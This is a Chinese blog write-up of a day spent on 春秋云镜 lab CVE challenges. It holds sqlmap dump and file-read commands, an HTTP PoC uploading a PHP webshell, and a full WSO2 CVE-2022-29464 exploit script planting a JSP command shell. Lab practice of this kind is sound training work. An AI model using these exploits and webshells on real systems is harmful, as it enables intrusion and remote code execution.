春秋云镜wp day1

article/2025/8/28 20:15:29

春秋云镜wp day1 (qq.com) 建议关注公众号

websec.space,以后文章来csdn备份一份

今天看到之前买了内网渗透那本书,今天看到靶场上线了,打一天玩一下,总体cve的洞很好刷,比打CTF轻松多了。

CVE-2022-32991

首先登陆,点击第二个start,抓包并保存到一个txt

python sqlmap.py -r 1.txt --dbs  --random-agent -p eid 

获取flag

python sqlmap.py -r 1.txt -D ctf -T flag -C flag --dump  --random-agent -p eid

Web Based Quiz System v1.0 is vulnerable to SQL Injection via welcome.php · 语雀 (yuque.com)

CVE-2022-30887

多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。

poc

POST /php_action/editProductImage.php?id=1 HTTP/1.1
Host: eci-2zegbcou4c05rxuhfujv.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------208935235035266125502673738631
Content-Length: 556
Connection: close
Cookie: PHPSESSID=t1jo541l52f76t9upiu0pbqv0c
Upgrade-Insecure-Requests: 1
​
-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="old_image"
​
​
-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="productImage"; filename="shell.php"
Content-Type: image/jpeg
​
<?php
if($_REQUEST['s']) {system($_REQUEST['s']);} else phpinfo();
?>
</pre>
</body>
</html>
-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="btn"
​
​
-----------------------------208935235035266125502673738631--

访问/assets/myimages/shell.php

CVE-2022-28525

ED01-CMS v20180505 存在任意文件上传漏洞

admin admin登陆,直接在头像上传处上传webshell

访问/images/shell.php

CVE-2022-29464

WSO2文件上传漏洞(CVE-2022-29464)是Orange Tsai发现的WSO2上的严重漏洞。该漏洞是一种未经身份验证的无限制任意文件上传,允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得RCE。

import requests, urllib3, sys
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
​
if len(sys.argv) != 3:print(f"Usage: python3 {sys.argv[0]} https://host shell.jsp")exit()host, file = sys.argv[1:]
shell = """<FORM><INPUT name='cmd' type=text><INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %><%String cmd = request.getParameter("cmd");String output = "";if(cmd != null) {String s = null;try {Process p = Runtime.getRuntime().exec(cmd,null,null);BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));while((s = sI.readLine()) != null) { output += s+"</br>"; }}  catch(IOException e) {   e.printStackTrace();   }}
%><pre><%=output %></pre>"""
​
files = {f"../../../../repository/deployment/server/webapps/authenticationendpoint/{file}": shell}
response = requests.post(f'{host}/fileupload/toolsAny', files=files, verify=False)
print(f"shell @ {host}/authenticationendpoint/{file}")

CVE-2022-29464/exploit.py at main · hakivvi/CVE-2022-29464 (github.com)

访问,获取flag

CVE-2022-28512

Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客,它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能,您无需接触任何代码即可启动并运行您的博客。 该CMS的/single.php路径下,id参数存在一个SQL注入漏洞。

  • MISC:https://github.com/JiuBanSec/CVE/blob/main/Fantastic%20Blog%20CMS/SQL1.md

  • MISC:https://www.sourcecodester.com/php/12258/fantastic-blog-cms-php.html

找到细节,直接放进sqlmap跑出flag

python sqlmap.py -u http://eci-2zeg7t9zem78xthlwwim.cloudeci1.ichunqiu.com/single.php?id=1 --dbs

python sqlmap.py -u http://eci-2zeg7t9zem78xthlwwim.cloudeci1.ichunqiu.com/single.php?id=1 -D ctf -T flag -C flag --dump

CVE-2022-28060

Victor CMS v1.0 /includes/login.php 存在sql注入

库名

available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] php_cms
[*] sys

表名php_cms

Database: php_cms
[4 tables]
+------------+
| categories |
| comments   |
| posts      |
| users      |
+------------+

users列名

+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| user_email     | varchar(255) |
| user_firstname | varchar(255) |
| user_id        | int(3)       |
| user_lastname  | varchar(255) |
| user_name      | varchar(255) |
| user_password  | varchar(255) |
+----------------+--------------+

post

[10 columns]
+--------------------+--------------+
| Column             | Type         |
+--------------------+--------------+
| post_author        | varchar(255) |
| post_category_id   | int(3)       |
| post_comment_count | varchar(255) |
| post_content       | text         |
| post_date          | date         |
| post_id            | int(3)       |
| post_image         | text         |
| post_status        | varchar(255) |
| post_tags          | varchar(300) |
| post_title         | varchar(255) |
+--------------------+--------------+

Database: php_cms
Table: categories
[2 columns]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| cat_id    | int(11)      |
| cat_title | varchar(255) |
+-----------+--------------+

Database: php_cms
Table: comments
[7 columns]
+-----------------+--------------+
| Column          | Type         |
+-----------------+--------------+
| comment_author  | varchar(255) |
| comment_content | text         |
| comment_date    | date         |
| comment_email   | varchar(255) |
| comment_id      | int(3)       |
| comment_post_id | int(3)       |
| comment_status  | varchar(255) |
+-----------------+--------------+

感觉思路不对,试试读文件

 python3 sqlmap.py -r 1.txt  --file-read "/flag" --dbms Mysql

CVE-2022-26201

Victor CMS v1.0 存在二次注入漏洞

sql注入的题目能用sqlmap梭哈就不动手了

找到注入点

CVE-2022-26965

Pluck-CMS-Pluck-4.7.16 后台RCE

admin admin登陆

添加themes

https://github.com/pluck-cms/themes

下载下来后,为了防止有什么不一样直接用网上公开的,选择bestfriends

在info.php里面写入一句话木马

上传bestfirends之后访问

访问/data/themes/bestfriends/info.php

成功执行

CVE-2022-25488

Atom CMS v2.0存在sql注入漏洞在/admin/ajax/avatar.php页面

网上搜到注入点/admin/ajax/avatar.php?id=1

直接sqlmap梭哈

python sqlmap.py -u 'http://eci-2zeganb9o0foqjjj260n.cloudeci1.ichunqiu.com/admin/ajax/avatar.php?id=1' --file-read "/flag" --dbms Mysql

http://chatgpt.dhexx.cn/article/oLw9VOm6.shtml

相关文章

计算机网络谢希仁第七版 第四章 答案

计算机网络谢希仁第七版 第四章 网络层 计算机网络 第七版 谢希仁 答案 1.网络层向上提供的服务有哪两种?是比较其优缺点。网络层向运输层提供 “面向连接”虚电路(Virtual Circuit)服务或“无连接”数据报服务前者预约了双方通信所需的一切网络资源。优点是能提供服务质…

《计算机网络》谢希仁第七版知识点总结

1 概述1.1 网络的网络1.2 互联网的组成1.2.1 边缘部分1.2.2 核心部分 1.3 计算机网络的类别1.4 计算机网络的性能指标&#xff08;考点&#xff09;1.4.1 速率1.4.2 时延 1.5 计算机网络的体系结构1.5.1 协议与划分层次 1.6 各协议的体系结构1.6.1 各层功能概述1.6.2 主机H1向H…

计算机网络谢希仁第七版课后习题答案(第九章)

1.无线局域网都由哪几部分组成&#xff1f;无线局域网中的固定基础设施对网络的性能有何影响&#xff1f;接入点 AP 是否就是无线局域网中的固定具体设施&#xff1f; 无线局域网由无线网卡、无线接入点(AP)、计算机和有关设备组成&#xff0c;采用单元结构&#xff0c;将整个系…

计算机网络第四章课后答案(第七版谢希仁著)

计算机网络第四章课后答案简介&#xff1a; 平时老师布置的作业自己做的答案&#xff0c;仅是做参考&#xff0c;希望有帮助 还可以把全部的答案分享给大家&#xff1a;>完整答案< 第四章课后作业答案&#xff1a; 第一页&#xff1a; 第二页&#xff1a; 第三页&#…

计算机网络第七版 第四章课后答案

4-55.如图所示&#xff0c;网络145.13.0.0/16划分为四个子网N1,N2,N3和N4。这四个子网与路由器R连接的接口分别是m0&#xff0c;m1&#xff0c;m2和m3。路由器R的第五个接口m4连接到互联网。 有题目可以看出四个网络地址的地址掩码均为/18,故可以得出子网掩码均为255.255.192.0…

计算机网络第七版(谢希仁)第五章——传输层课后习题答案(上)

文章目录 5-01解答 5-02解答 5-03解答 5-04解答 5-05解答 5-06解答 5-07解答 5-08解答 5-09解答 5-10解答 5-11解答 5-12解答 5-13解答 5-14解答 5-15解答 5-16解答 5-17解答 5-18解答 5-19解答 5-20解答 5-21解答 5-22解答 5-23解答 5-24解答 5-25解答 5-26解答 5-27解答 5-28…

计算机网络谢希仁第七版 第二章 课后答案

计算机网络谢希仁第七版 第二章 课后答案 2-01 物理层要解决哪些问题&#xff1f;物理层的主要特点是什么&#xff1f;计算机网络谢希仁 答案&#xff1a;物理层要解决的主要问题&#xff1a; &#xff08;1&#xff09;物理层要尽可能地屏蔽掉物理设备和传输媒体&#xff0c;…

《计算机网络(第七版)谢希仁 编著》部分课后答案

1-28 假定要在网络上传送1.5MB的文件。设分组长度为1KB&#xff0c;往返时间RTT80ms。传送数据之前还需要有建立TCP连接的时间&#xff0c;这时间是2RTT160ms。试计算在以下几种情况下接收方收完该文件的最后一个比特所需的时间。 &#xff08;1&#xff09;数据发送速率为…

计算机网络 第七版【谢希仁】部分答案(第1~7章)【附:电子书】

计算机网络&#xff08;第7版&#xff09;-谢希仁主编.pdf&#xff1a;【链接&#xff1a;https://pan.baidu.com/s/1Nkz7Gxd6hoChXntR6860bw 提取码&#xff1a;zjxs】 建议在拼多多上买本习题解答&#xff01; 目 录 第一章 概述 第二章 物理层 第三章 数据链路层 第…

计算机网络第七版 谢希仁 课后答案

想看更多算法题&#xff0c;可以扫描上方二维码关注我微信公众号“数据结构和算法”&#xff0c;截止到目前我已经在公众号中更新了500多道算法题&#xff0c;其中部分已经整理成了pdf文档&#xff0c;截止到目前总共有800多页&#xff08;并且还会不断的增加&#xff09;&…

第七版自顶向下 第一章中文版 计算机网络课后习题答案

本人编写了1-9章全部答案&#xff0c;在我发布的pdf文件里&#xff0c;需要的话自行下载。文件免费 第一章 R组 1.主机和端系统这两个概念没有什么不同。在本书中&#xff0c;“主机”这个名词和“端系统”这个名词可以相互替换。端系统包括PC、工作站、web服务器、邮件服务器、…

计算机网络(第七版)谢希仁编著 前五章课后答案计算题详解

前五章课后答案计算题详解 目录 第一章&#xff1a; 第二章 第三章 第四章 第一章&#xff1a; 10、试在下列条件下比较电路交换和分组交换。要传送的报文共x&#xff08;bit&#xff09;&#xff0c;从源站到目的站共经过k段链路&#xff0c;每段链路的传播时延为d&#x…

CentOS7通过omnibus安装包搭建GitLab环境

简介 gitlab是一个开源的软件&#xff0c;类似于github.com那样的git代码管理仓库&#xff0c;这里利用官方的omnibus安装包进行简单部署GitLab环境 安装依赖环境 yum install -y git #安装git yum install -y openssh-server #安装openssh-server systemctl enable openss…

Gitlab omnibus 8.15.1 升级到 9.5.+

升级场景 由于公司要通过gitlab接入ci和cd功能&#xff0c;经测试一个repo不能正常使用&#xff0c;且gitlab9.5之后增加了很多新功能&#xff0c;比较吸引我们 GPG Commit Verification: GPG密钥允许您验证签名提交 New Navigation Improvements: 界面窗口有所改进&#xff0…

gitlab升级(Omnibus packages)

为什么80%的码农都做不了架构师&#xff1f;>>> 1、下载安装包 wget https://mirrors.tuna.tsinghua.edu.cn/gitlab-ce/yum/el6/gitlab-ce-8.7.0-ce.0.el6.x86_64.rpm 下载rpm包时&#xff0c;使用清华的镜像 2、rpm升级 rpm -Uvh gitlab-ce-8.7.0-ce.0.el6.x86_64…

CentOS 7 Omnibus 包安装 GitLab 并汉化记录

为什么80%的码农都做不了架构师&#xff1f;>>> 系统环境 操作系统&#xff1a;CentOS 7 GitLab&#xff1a;gitlab-ce-10.8.4-ce.0.el7.x86_64.rpm下载Omnibus安装包 使用国内镜像加速下载地址 # wget https://mirrors.tuna.tsinghua.edu.cn/gitlab-ce/yum/el7/gi…

Omnibus系列之 创建ObjectServer并配置

前面博客里已经安装好了 Object Server、Probe、还有gateway组件&#xff0c;接下来进行配置&#xff0c;使各组件运行起来。 首先创建Object server DB&#xff0c;linux和windows版本的操作系统创建的方法如下 创建object server DB&#xff0c;执行以下命令 NCOMS是系统默认…

系统为 ubuntu 18.04的docker中omnibus 方式安装 gitlab

一&#xff1a;拉镜像 1&#xff1a;拉镜像 docker pull ubuntu:18.04 2&#xff1a;启动镜像&#xff1a;这里必须加上-p&#xff0c;即端口号的映射&#xff0c;否则访问不到。 最好用桥接模式联网&#xff0c;默认的就行。 docker run -itd -p 443:443 -p 80:80 -p 222:22 …

Gitlab的一键安装包omnibus

2019独角兽企业重金招聘Python工程师标准>>> Gitlab和omnibus安装包 Gitlab能够让你的团队拥有自己的github&#xff0c;完全拥有整个git服务的账号管理&#xff0c;项目管理&#xff0c;issue管理&#xff0c;merge request等方便研发团队的工具。 Gitlab是开源的&…

error: unable to open preload file “/etc/sysctl.d/90-omnibus-gitlab-net.core.somaxconn.conf“

centos6.9环境下&#xff1a;gitlab-ctl reconfigure时报错 error: unable to open preload file "/etc/sysctl.d/90-omnibus-gitlab-net.core.somaxconn.conf" 解决方案&#xff1a; export LC_CTYPEen_US.UTF-8 export LC_ALLen_US.UTF-8